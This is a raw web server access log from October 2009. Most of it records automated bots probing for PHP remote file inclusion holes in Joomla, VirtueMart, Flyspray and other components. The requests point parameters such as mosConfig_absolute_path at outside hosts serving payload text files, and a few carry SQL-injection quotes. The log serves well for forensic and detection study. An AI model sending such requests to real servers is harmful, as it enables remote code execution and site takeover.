130.13.166.92 - - [28/Oct/2009:00:10:14 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265E1AB0B500100908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:10:14 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265E1AB0B500100908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:10:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F265117F0850038A908H+M37+ENG HTTP/1.1" 200 77213 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265E1AB0B500100908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
61.100.5.136 - - [28/Oct/2009:00:10:21 -0400] "GET //?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:10:21 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:10:21 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
130.13.166.92 - - [28/Oct/2009:00:10:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F26571AE0F5003E2908H+M37+ENG HTTP/1.1" 200 77213 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265117F0850038A908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
61.100.5.136 - - [28/Oct/2009:00:10:35 -0400] "GET //?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:10:35 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:10:36 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 200 23667 "-" "Mozilla/5.0"
130.13.166.92 - - [28/Oct/2009:00:10:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F265C1F20950037E908H+M37+ENG HTTP/1.1" 200 39110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F26571AE0F5003E2908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
62.140.23.192 - - [28/Oct/2009:00:10:47 -0400] "GET /logs/error_log.Q109092000%20%20//bbs///skin/ggambo7002_board/setup.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:10:55 -0400] "GET /logs/access_log.Q109071400%20%20//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.5.136 - - [28/Oct/2009:00:11:08 -0400] "GET /logs/access_log.Q109071400%20%20//?path%5Bdocroot%5D=http://www.topumpitup.co.kr//zeroboard/dmp/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.99.2 - - [28/Oct/2009:00:11:45 -0400] "GET /logs/access_log.Q109062600//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=' HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
125.251.99.2 - - [28/Oct/2009:00:11:46 -0400] "GET //index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=' HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
125.251.99.2 - - [28/Oct/2009:00:11:46 -0400] "GET /logs//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=' HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
130.13.166.92 - - [28/Oct/2009:00:11:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F26591B2045004DD908H+M37+ENG HTTP/1.1" 200 47137 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F265C1F20950037E908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
222.236.47.182 - - [28/Oct/2009:00:12:06 -0400] "GET /components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.182 - - [28/Oct/2009:00:12:06 -0400] "GET /logs/access_log.Q109082300/components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.182 - - [28/Oct/2009:00:12:06 -0400] "GET /logs/components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:12:07 -0400] "GET /logs/error_log.Q109081900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831"
209.59.12.99 - - [28/Oct/2009:00:12:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.72.215.82 - - [28/Oct/2009:00:12:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:12:09 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:12:12 -0400] "GET /logs/error_log.Q109081900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:12:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:12:14 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:12:15 -0400] "GET /logs/error_log.Q109081900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:16 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:16 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
125.251.99.2 - - [28/Oct/2009:00:12:16 -0400] "GET /logs/access_log.Q109060600//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=' HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
130.13.166.92 - - [28/Oct/2009:00:12:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F265D11B0350087D908H+M37+ENG HTTP/1.1" 200 39089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F26591B2045004DD908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
93.93.131.94 - - [28/Oct/2009:00:12:20 -0400] "GET /logs/error_log.Q109081900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:32 -0400] "GET /logs/error_log.Q109081900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:12:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.27.196.133 - - [28/Oct/2009:00:13:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:13:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
93.93.131.94 - - [28/Oct/2009:00:13:05 -0400] "GET /logs/access_log.Q109100600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:05 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:05 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:05 -0400] "GET /logs/access_log.Q109082000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
66.27.196.133 - - [28/Oct/2009:00:13:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:13:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
93.93.131.94 - - [28/Oct/2009:00:13:17 -0400] "GET /logs/access_log.Q109100600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:18 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:19 -0400] "GET /logs/access_log.Q109100600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:30 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:30 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:30 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:13:31 -0400] "GET /logs/access_log.Q109082000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:13:31 -0400] "GET /logs/access_log.Q109082000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
122.155.5.84 - - [28/Oct/2009:00:13:31 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:13:31 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:13:31 -0400] "GET /?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:13:31 -0400] "GET /logs/?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 200 23662 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:13:33 -0400] "GET /logs/access_log.Q109082000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:13:35 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:36 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:36 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:38 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:13:38 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:13:43 -0400] "GET /logs/access_log.Q109100600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:13:44 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:13:44 -0400] "GET /logs/access_log.Q109100600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:13:44 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:13:44 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:13:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:13:55 -0400] "GET /logs/access_log.Q109082000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
217.199.218.29 - - [28/Oct/2009:00:13:59 -0400] "GET /logs//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:13:59 -0400] "GET //index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:13:59 -0400] "GET /logs/access_log.Q109062600//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:13:59 -0400] "GET /logs/access_log.Q109060600//index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:14:03 -0400] "GET /logs/access_log.Q109072500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:03 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:03 -0400] "GET /logs/access_log.Q109072500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:04 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:14:08 -0400] "GET /logs/access_log.Q109072500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:14:13 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
114.108.177.238 - - [28/Oct/2009:00:14:14 -0400] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.108.177.238 - - [28/Oct/2009:00:14:14 -0400] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:14:15 -0400] "GET /logs/access_log.Q109072600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:15 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:14:15 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
114.108.177.238 - - [28/Oct/2009:00:14:15 -0400] "GET /logs/access_log.Q109061100/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:14:17 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:14:17 -0400] "GET /logs/access_log.Q109072500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:18 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:18 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:14:19 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:14:22 -0400] "GET /logs/access_log.Q109090600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:25 -0400] "GET /logs/access_log.Q109072500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:14:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
114.108.177.238 - - [28/Oct/2009:00:14:26 -0400] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.htaqua.ru/libraries/joomla/plugin/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
